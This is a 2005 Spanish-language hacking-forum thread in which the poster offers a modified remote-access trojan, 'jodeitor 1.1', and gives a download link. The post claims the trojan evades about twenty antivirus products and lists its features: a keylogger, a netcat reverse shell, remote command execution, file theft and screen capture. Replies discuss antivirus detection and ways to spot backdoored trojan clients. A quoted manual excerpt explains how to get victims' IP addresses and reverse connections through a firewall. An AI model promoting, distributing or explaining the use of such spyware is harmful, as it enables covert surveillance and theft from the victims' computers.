elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 00:28  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  jodeitor 1.1 [antiguo trojan indetectable]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: jodeitor 1.1 [antiguo trojan indetectable]  (Leído 1,335 veces)
chapinhack

Desconectado Desconectado

Mensajes: 56


viva Guatemala Pisados


Ver Perfil WWW
jodeitor 1.1 [antiguo trojan indetectable]
« en: 14 Septiembre 2005, 04:04 »

Este troyano fue echo por crashcool hace tiempos hay se me ocurrio hacerle algunas modificaciones pues lo logre hacer indectable ante:
AntiVir   
Avast
Avira   
BitDefender   
CAT-QuickHeal   
ClamAV   
DrWeb   
eTrust-Iris   
eTrust-Vet   
Fortinet   
F-Prot   

McAfee   
NOD32v2
Norman   
Panda   
Sophos   
Symantec   
TheHacker   
   
aca las funciones del troyano:

   
Versión Actual: 1.1 (Beta)
Captura:

Especificaciones
   
Información:
-Informacion del Sistema operativo, version ...
-Tipo de Conexión.
-Nombre local
-Disco duro libre.
Escritorio:
Pantalla:
-Girar,estrechar, scroll..
Raton:
- intercambiar botones,
hacer click, estela puntero, control remoto del raton.
Colores:
Cambiar Colores de Windows.
Mensajes:
-Nos permite enviar mensajes configurados de error
- Chat con la víctima
Windows:
-Apagar Win 95/98/Me y NT, 2000 ,xp y 2003
-Abrir/cerrar Cd-Rom
-Colgar el modem.
-Reverse shell con netcat.
Explorer:
-Completo explorador de unidades con posibilidad de:
-Navegar por todas las unidades disponibles
-Conocer especificaciones técnicas de dichas unidades
-Explorador de archivos, carpertas ..
-Ejecutar archivos.
-Ver Tamaño de archivos
-Crear carpetas
-Tomar y transferir ficheros
-Abrir navegador por defecto en una URL.
Teclado:
-Completo Keyloger que nos informará de las ventanas en las que se
encuentra asi como las teclas que está pulsando.
-Teclado Virtual: Un completo teclado virtual con todas sus teclas
para poder escribir y manejar el teclado a distancia:
-Imprimir Texto por la impresora
-Ver / establecer texto en el portapapeles
Procesos:
-Visor y matador de procesos, ocn la posibilidad de ver
la id de cada proceso.
Ventanas:
-Visor de ventanas abiertas, con posibilidad de:
-Saber la ventana activa en ese momento.
-Cambiar el título de cada ventana
Capturas: Posibilidad de obtener capturas del escritorio remoto.
Comandos: potente funcion que nos dara la posibilidad de ejecutarle
comandos cmd.exe asi como ver la salida de los comandos.
Local: Informacion Local.

*Usalo bajo tu propia responsabilidad.



para poder usarlo debes de usar el server que dice indetectable, le he dejado el otro server solo para que vieran como era detectado, bueno aca dejo la descarga:

   http://rapidshare.de/files/4996825/JODEITORV1.1.zip.html

hasta luego...
« Última modificación: 16 Septiembre 2005, 00:04 por chapinhack » En línea

Guatemala tu nombre inmortal.
nofx_diaz

Desconectado Desconectado

Mensajes: 78


Ver Perfil
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #1 en: 14 Septiembre 2005, 13:24 »

No se porque sera, pero la mayoria de los antivirus me detectan 'trojan' en el cliente... asi que paso de ejecutarlo.
En línea
Джордж
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.077



Ver Perfil
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #2 en: 14 Septiembre 2005, 15:44 »

Citar
No se porque sera, pero la mayoria de los antivirus me detectan 'trojan' en el cliente... asi que paso de ejecutarlo


Pasale el aV al cliente del NCR, al de ProRat, etc.... a ver si canta tambien.....

Eso es normal, los AV,s detectan el cliente como herramienta hacker tambien.
En línea

chapinhack

Desconectado Desconectado

Mensajes: 56


viva Guatemala Pisados


Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #3 en: 15 Septiembre 2005, 04:14 »

claro para pasarle el antivirus y ver que es indetectable solo tienes que testear el server que dice server_indetectable, ya tiene tiempos y aun no lo pillan  ;D ;D
En línea

Guatemala tu nombre inmortal.
-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #4 en: 15 Septiembre 2005, 21:39 »

suena mal tdo sto.....
En línea
Thor


Desconectado Desconectado

Mensajes: 1.176


Ver Perfil
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #5 en: 15 Septiembre 2005, 22:07 »

Pues fijaos en como detecta al cliente si le detecta como jodeitor entonces es normal :D, si lo detecta como bifrost mal asunto.
A todo esto, ¿vosotros como intentariasis ver si un archivo tiene bindeao otro dentro? Yo cojo el hex y voy en busca de cabezeras PE busco "MZ" y aver...alguna vez he conseguido algo, pero con un binder que encriptara los archivos que junta no los podria encontrar asi.
Quizas seria mas util poner el deep ejecutarlo y ver el movimiento que ha habido en el disco duro... ::).

Saludos.
En línea
Simbelmynë


Desconectado Desconectado

Mensajes: 856



Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #6 en: 15 Septiembre 2005, 23:51 »

Bueno, los detecta con nomenclaturas distintas al cliente y al servidor, pero siempre como Craschool, asi que no creo que este sucio, eso no puede asegurarse, pero bueno...
KAV detecta la modificacion lamentablemente, pero no es un antivirus muy utilizado.
Saludos, gracias por compartir tu trabajo.
En línea

chapinhack

Desconectado Desconectado

Mensajes: 56


viva Guatemala Pisados


Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #7 en: 16 Septiembre 2005, 00:10 »

yo no entiendo porque gente ha echo cosas como esas de fregar a la gente, a los propios newbies, hay quienes backdorizan los clientes, como que no tubieran suficiente memoria para conseguir sus propias victimas, no de ese modo, pues yo a todos los que les interesa el tema hacking los considero mis amigos y todo esto es cn fines puramente educacionales, haber cuando logre perfeccionar el metodo se los publico  ;D ;D ;D
En línea

Guatemala tu nombre inmortal.
Джордж
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.077



Ver Perfil
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #8 en: 16 Septiembre 2005, 16:19 »

Hola, tambien se puede saber de una manera muy simple y visual. Hace tiempo hice un manual sobre algunas cosillas, todavia esta con chincheta donde comentaba como descubrir si un cliente esta backdorizado.... entre otras cosas comentaba esto:


Citar
ACCESO / DENEGACION FIREWALL



Este proceso hará que en el momento de que se inicie el server, a nuestra victima le aparezca un mensaje en caso de que use firewall que le diga lo siguiente:



Pero en lugar del puerto 1863, le debe aparecer el puerto 2087 que es el que hemos configurado el server. Así pues cuando nuestra victima autorice al firewall, automáticamente el cliente conectará con el server y ya tendremos el dominio sobre la otra maquina....

Si en lugar de usar conexión inversa, usáramos la conexión directa, aparecería un mensaje del firewall solicitando permiso para que el server enviara la notificación de la IP y del puerto al cliente, algo así:



Para este ejemplo he tomado la conexión directa del server del NCR. Esto significa que cuando infectamos a alguien con conexión directa y tiene firewall, le da el aviso de que el proceso Logon32.exe esta intentando acceder a internet por el puerto 80. Por lo tanto a poco que nuestra víctima sea inteligente le denegara el acceso y no enviara la información al correo, por lo tanto no tendrás los datos de tu  victima. Aunque siempre los podrás obtener si lo tienes agregado al mesenger, le pasas un archivo y mientras te vas a la consola de MS-DOS, tal y como vimos al principio y en el momento que le estés pasando el archivo o él a ti, tecleas y ejecutas el siguiente comando: C:\> netstat –an  y (Enter) a continuación te mostrara todas las conexiones que tu pc tiene establecidas. Para esto es aconsejable que tengas cerradas todas las ventanas que puedas con acceso a la red y por supuesto el emule u otro programa P2P, ya que mostraría infinidad de conexiones.... simplemente localizas la conexión establecida por el puerto del mesenger y esa será la IP de tu victima.

Bueno, ya hemos visto las diferentes posibilidades que tenemos de notificación por parte de nuestras victimas, tanto por conexión directa como inversa. Aclarado esto, podemos deducir, que si nuestras victimas no autorizan los procesos salientes para que nos llegue la notificación por conexión directa, NO PODREMOS CONECTAR a no ser que conozcamos su IP, ya que no nos llegara la notificación. Esto no es aplicable a la conexión inversa, ya que el server es el que esta a la escucha para conectar con el cliente y si la victima no autoriza la salida, el server no conectara con el cliente.


DETECCION DE UN CLIENTE TROYANIZADO O UN EDITOR (NOCIONES MUY BASICAS)



Bueno ahora vamos a ver que pasa cuando el cliente de un troyano lleva un “backdoor” y al ejecutarse envía una notificación al su autor o a la persona que lo contamino....

Voy a juntar un server de NCR junto con el cliente de este, para que en el momento que ejecutemos el cliente, el server nos infecte. Así pues veremos que el firewall nos volverá a dar el aviso tal y como ya lo hizo anteriormente.



Como vemos al ejecutar el cliente nos aparece la ventana del firewall y seguido nos aparecerá el cliente que hemos ejecutado para conectar con nuestra victima,



Bueno pues con esto ya tenemos claro cuando el cliente de una aplicación esta “backdoorizado”, esto es aplicable a los editores y otros ejecutables que no sean el servidor.

¿Podemos saber quien ha sido el gracioso que nos quiere controlar? Pues si, solo tenemos que hacer lo siguiente:

Abrimos la consola de MS-DOS, y tecleamos el mismo comando que pusimos antes para ver la IP de nuestra victima a través del msn, osea C:\>netstat –an  y si cogemos como ejemplo el server del NCR que hemos configurado anteriormente, y cerramos todas las ventanas activas de internet y cualquier programa que este conectado a la red, el comando netstat nos debe mostrar nuestra IP local, la IP de nuestro “amigo” que troyanizó el cliente / editor.... y el puerto de conexión. Así pues ya sabemos detrás de que IP se esconde la persona que “backdoorizó” el troyano.

Con esto, creo que queda bastante claro para los más nuevos como funciona sobre todo la conexión inversa, como abrir los puertos de nuestro router, como gestionarlo, crear una cuenta no-ip, usar el IP-DUC, configurar el server para la conexión inversa, porque no podemos conectar con las victimas si ellos han ejecutado el server, y algunas cosilla mas que siempre vienen bien para los mas nuevos....

En línea

Thor


Desconectado Desconectado

Mensajes: 1.176


Ver Perfil
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #9 en: 16 Septiembre 2005, 18:55 »

Si, mediante un firewall puedes estar algo mas seguro de que el cliente no intenta nada extraño, pero eso se podria saltar.
Imaginate que el cliente extrae en system32 el troyano "bindeao" y este esta configurado para ejecutarse en el proximo reinicio por ejemplo. El firewall no veria nada en ese instante, sino que lo pillaria en el proximo reinicio... A lo que quiero llegar una buena forma seria usar RegShot, un programa que compara el sistema como estaba antes y como esta despues.

Arrancamos el RegShot, hacemos una "foto" del sistema, arrancamos el cliente y hacemos otra "foto" del sistema. Comparamos las fotos y comprobamos que no se han extraido archivos a ningun sitio y no se han agregado claves extrañas al registro.

Este programa tmb puede servir para ver que claves añade un server al ejecutarle y mas cosas.
Saludos.
En línea
-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #10 en: 16 Septiembre 2005, 20:25 »

buena info
En línea
Джордж
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.077



Ver Perfil
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #11 en: 16 Septiembre 2005, 21:33 »

Hola Thor, es cierto, pero si el server esta inyectdao con IExplorer, Emule, mesenger,.... lo que sea y que se ejecute al reinicio, igual nos enteramos, porque IExplorer o el proceso que sea ya esta autorizado por nosotros para acceder a internet. Ademas canta el proceso y el puerto....

Sobre lo del registro, tambien es cierto, yo para eso uso TDS-3, ademas de para otras cosas.... ;)

Venga, simplemente era comentar un poco tus lineas.

Un saludo.
En línea

chapinhack

Desconectado Desconectado

Mensajes: 56


viva Guatemala Pisados


Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #12 en: 18 Septiembre 2005, 07:57 »

ha creo que no confiaron en mi, porque en ves de especificar los fallos o cosas buenas se han puesto a criticar y hablar para descubrir si estaba backdorizado que es totalmente otro tema, bueno todo esto sirve para expeciencia ;D ;D
En línea

Guatemala tu nombre inmortal.
BloCKeadO


Desconectado Desconectado

Mensajes: 2.250


Made in Spain.


Ver Perfil WWW
Re: jodeitor 1.1 [antiguo trojan indetectable]
« Respuesta #13 en: 20 Septiembre 2005, 15:20 »

Yo utilizo un firewall y a mas un sniffer del registro.

El fire me alertara de un proceso que intente acceder a internet, y salvo que no burle al fire, aunque incluya inyeccion, el proceso habra cambiado y el fire lo alerta.

Y si modifica el registro, esta el sniffer para alertar y no permitir que lo modifique.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Malware o trojan como hacerlo indetectable ?
Análisis y Diseño de Malware
cerorar 8 3,703 Último mensaje 30 Abril 2011, 23:19
por skapunky
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines